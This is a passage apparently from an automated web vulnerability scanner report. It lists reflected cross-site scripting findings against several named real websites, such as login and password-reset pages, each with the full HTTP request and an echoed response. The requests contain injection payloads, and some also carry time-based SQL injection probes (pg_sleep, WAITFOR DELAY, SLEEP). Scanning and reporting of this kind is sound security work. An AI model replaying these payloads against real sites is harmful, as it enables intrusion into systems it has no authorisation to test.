GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--6728f<script>alert(1)</script>cb43f085596&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 22:59:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=EBDDE581391985FB7AFB4871D64D33CB; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
43

EXCEPTION: java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--6728f<script>alert(1)</script>cb43f085596&replace1_ul_=3&totalvalues=3


<table border="0">
...[SNIP]...
5.37. http://learn.bridgefront.com/sendpassword [replace1_ul_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace1_ul_ request parameter is copied into the HTML document as plain text between tags. The payload 4364a<script>alert(1)</script>7b5aaa36f8a was submitted in the replace1_ul_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=34364a<script>alert(1)</script>7b5aaa36f8a&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:08:42 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=60C3DEE51835B2637DD8623D228E3CF7; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
java.lang.NullPointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=34364a<script>alert(1)</script>7b5aaa36f8a&totalvalues=3


<table border="0">
...[SNIP]...
5.38. http://learn.bridgefront.com/sendpassword [totalvalues parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the totalvalues request parameter is copied into the HTML document as plain text between tags. The payload cf847<script>alert(1)</script>aac6a0e8002 was submitted in the totalvalues parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3cf847<script>alert(1)</script>aac6a0e8002 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 23:23:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=D667D7ACE515F68FAD80C1A183A8E4FD; Path=/
Content-Length: 6471
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head><title>Application Error </title>

<script language="JavaScript" type="text/JavaScript">

   function showdiv2(param)
   {
    if(param=="show")
    {
    document.all.div1.style.visi
...[SNIP]...
PointerException

JSP REQUESTED: /errorpage.jsp?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=%27%3BSELECT%20pg_sleep(25)--&replace1_ul_=3&totalvalues=3cf847<script>alert(1)</script>aac6a0e8002


<table border="0">
...[SNIP]...
5.39. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload ecadb<script>alert(1)</script>6684c5b90cb640ea3 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Passwordecadb<script>alert(1)</script>6684c5b90cb640ea3&username=&existingPassword=&newPassword= HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=MBNPJKACNAJKJFBPLELMNGGF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3707
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:20:55 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
<div class='divMessage'>Invalid Username / Passwordecadb<script>alert(1)</script>6684c5b90cb640ea3</div>
...[SNIP]...
5.40. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 6c34d<script>alert(1)</script>032f27b5100 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password6c34d<script>alert(1)</script>032f27b5100 HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3701
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:19:36 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
<div class='divMessage'>Invalid Username / Password6c34d<script>alert(1)</script>032f27b5100</div>
...[SNIP]...
5.41. http://login.vindicosuite.com/default.asp [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 8a741<script>alert(1)</script>c3baafbd359 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password8a741<script>alert(1)</script>c3baafbd359 HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2335
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:21:14 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<td width="247" height="33" colspan="2">Invalid Username and or Password8a741<script>alert(1)</script>c3baafbd359</td>
...[SNIP]...
5.42. http://login.vindicosuite.com/default.asp [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 51889<script>alert(1)</script>3e60f2b813cb8e4d1 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password51889<script>alert(1)</script>3e60f2b813cb8e4d1&password=%27;WAITFOR%20DELAY%20%270:0:0%27-- HTTP/1.1
Referer: http://login.vindicosuite.com/vindico_dynamic.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=CMNPJKACHIDMMJGMMEKHFGND
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2341
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:32:21 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<td width="247" height="33" colspan="2">Invalid Username and or Password51889<script>alert(1)</script>3e60f2b813cb8e4d1</td>
...[SNIP]...
5.43. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 953fa%0aalert(1)//44bb86f9bed was submitted in the url parameter. This input was echoed as 953fa
alert(1)//44bb86f9bed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml953fa%0aalert(1)//44bb86f9bed&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/ HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:06:58 GMT
Expires: Fri, 06 May 2011 21:06:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 126

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/members.xml953fa
alert(1)//44bb86f9bed. HTTP error 400
5.44. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload ec21a%0aalert(1)//7e817ac7b43 was submitted in the site parameter. This input was echoed as ec21a
alert(1)//7e817ac7b43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=56727252ec21a%0aalert(1)//7e817ac7b43&d_id=software-soa HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 07 May 2011 01:21:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 459
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSQSQTAC=IOMLOCHABCHAGDICAICNNINC; path=/
Cache-control: private

//Plugins for site 56727252ec21a
alert(1)//7e817ac7b43
<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=
...[SNIP]...
5.45. https://secure.trust-guard.com/index.php [txtEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The value of the txtEmail request parameter is copied into the HTML document as plain text between tags. The payload 16a1d<script>alert(1)</script>7c0a4356b71 was submitted in the txtEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /index.php HTTP/1.1
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=todvqp9ae2pb55so66dlntmpe4
Accept-Encoding: gzip, deflate
Content-Length: 38

btnLogin=Submit&txtEmail=16a1d<script>alert(1)</script>7c0a4356b71&txtPassword=

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:57:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5133
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<span id='lblResult' style='color:red; ' >We could not find the account 16a1d<script>alert(1)</script>7c0a4356b71.</span>
...[SNIP]...
5.46. https://subscribe.haymarketmedia.com/scm/ [form parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The value of the form request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4039d"%3balert(1)//8ac54b4c9a7 was submitted in the form parameter. This input was echoed as 4039d";alert(1)//8ac54b4c9a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scm/?form=4039d"%3balert(1)//8ac54b4c9a7 HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xgwhobb5t5qhqnfgg1yyct45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:28 GMT
Content-Length: 5494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-1290429-25");
pageTracker._initData();
pageTracker._trackPageview("scm_4039d";alert(1)//8ac54b4c9a7_IS1105");
</script>
...[SNIP]...
5.47. http://support.expedia.com/app/answers/list/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.expedia.com
Path:   /app/answers/list/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cdc4"><a>ac9888ba52a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /app/answers/list/?1cdc4"><a>ac9888ba52a=1 HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; cp_session=UylSJgVxACRUPAJyAGoEaQRCDBEAA1FsA3EJOlZ2AngBcwR4ACYFPAF7WS1QIlIhACADPQd2VW4AJgM5ASBUdARyXyIBMAUSBHEIMwZEBCJTYFJCBXUAcVRxAn4ANgR9BHAMOwAxUWwDZAl%2FVjcCOwE8BCgANgVAAXBZelA1UnEAYAMXBzVVMwBhAz8BIFQuBGZfawFvBXYEZwhHBnMEdFMxUnYFJwA1VEICNgA%2FBGAEeAx7AGdRMwN2CSRWNgI5AXQEPgBABTcBJVk9UGFSNwA7AyUHLVVxADcDFQEVVFUEUV8iATEFZQQ3CGgGdgRjU3dSNwVGAEJUUgIHAHYENwQ2DDoANFFxA2AJYFZxAmcBFQQoADYFMAFtWWFQI1I8AHcDYgcQVWEAIQNjARJUMQQnXzUBRQVhBGQIMAYzBCJTYFIyBXAAYVR1AiQAdgQ2BEQMbwBwUTcDMwkjVjMCMQE1BCgANwVCATFZP1ByUmYAZAM3ByxVJwBwA3QBZ1REBDJfIgExBWUEOAhuBmMEY1N3UjcFRgA3VCMCYgBlBGYEQQw6ACBRIAM2CRVWZQJxAWMEOwB2BWABcll9UHJSZwAWA3wHYFVmAD0DdAFnVEYEIF96AS8FcQQxCCMGOAQlUw5SKwVxAGNUdQIjADoEagRuDAIAelFJAzYJH1YkAg4BEgQ1ADEFZAFFWUVQB1ICAD8DPQdkVTUAcwNsAWlUIgR%2F; supportsurvey=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%2526function%2520%2528%2529%257Bvar%2520a%253D%255B%2522%257B%2522%255D%252Cb%252Ck%252Cv%253Bfunction%2520p%2528s%2529%257Bif%2528b%2529%257Ba.push%2528%2522%252C%2522%2529%253B%257D%250Aa.push%2528k.toJSONString%2528%2529%252C%2522%253A%2522%252Cs%2529%253Bb%253Dtrue%253B%257D%250Afor%2528k%2520in%2520this%2529%257Bif%2528this.hasOwnProperty%2528k%2529%2529%257Bv%253Dthis%255Bk%255D%253Bswitch%2528typeof%2520v%2529%257Bcase%2522object%2522%253Aif%2528v%2529%257Bif%2528typeof%2520v.toJSONString%253D%253D%253D%2522function%2522%2529%257Bp%2528v.toJSONString%2528%2529%2529%253B%257D%257Delse%257Bp%2528%2522null%2522%2529%253B%257D%250Abreak%253Bcase%2522string%2522%253Acase%2522number%2522%253Acase%2522boolean%2522%253Ap%2528v.toJSONString%2528%2529%2529%253B%257D%257D%257D%250Aa.push%2528%2522%257D%2522%2529%253Breturn%2520a.join%2528%2522%2522%2529%253B%257D%253DtoJSONString%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:53:03 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9RJQx4ByMBaVcnVT8BbAFHDBFdXgY7AnBaaVZ2UigBc1IuAyUAOQF7ViIGdAh7UXFSbAFwADsAJlVvByYGJgN1AH0HNgUSUSQEPwZEAyVVZlFBDHwHdgEkVytVYwF4AXUMO11sBjsCZVosVjdSawE8Un4DNQBFAXBWdQZjCCtRMVJGATMAZgBhVWkHJgZ8A2EANAdpBXZRMgRLBnMDc1U3UXUMLgcyARdXY1VqAWUBfQx7XToGZAJ3WndWNlJpAXRSaANDADIBJVYyBjcIbVFqUnQBKwAkADdVQwcTBgcDVgB9BzcFZVFiBGQGdgNkVXFRNAxPB0UBB1dSVSMBMgEzDDpdaQYmAmFaM1ZxUjcBFVJ%2BAzUANQFtVm4GdQhmUSZSMwEWADQAIVU1BxQGYwMgAGoHQwVhUTEEPAYzAyVVZlExDHkHZgEgV3FVIwEzAUEMb10tBmACMlpwVjNSYQE1Un4DNABHATFWMAYkCDxRNVJmASoAcgBwVSIHYQYWAzUAfQc3BWVRbQRiBmMDZFVxUTQMTwcwAXZXN1UwAWMBRAw6XX0GdwI3WkZWZVIhAWNSbQN1AGUBclZyBiQIPVFHUi0BZgAzAD1VIgdhBhQDJwB0BycFbFEwBG4GZgNjVWBRWwwpBz8Bb1dkVTgBYQFmDGddMAZqAjxaYFY1UjEBY1I6AzoAMgEiVjoGZwhvUW9ScwE3AHwAKFUlBzcGcAM%2FAHoHWQV8UXIEaAZxA3NVPVFoDGUHXQF8V0lVNQFOAXUMBF1LBmoCMVpgVhFSTgEBUg0DagBvATBWYQZ2CDNRPlIiAS8%3D; path=/
RNT-Time: D=3309637 t=1304722383037218
RNT-Machine: 02
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95354


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
<a class = "noIntercept" href="/app/answers/list/?1cdc4"><a>ac9888ba52a=1/kw/" >
...[SNIP]...
5.48. http://tours.sapha.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe24"><script>alert(1)</script>d23c10e9ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488&bfe24"><script>alert(1)</script>d23c10e9ae=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
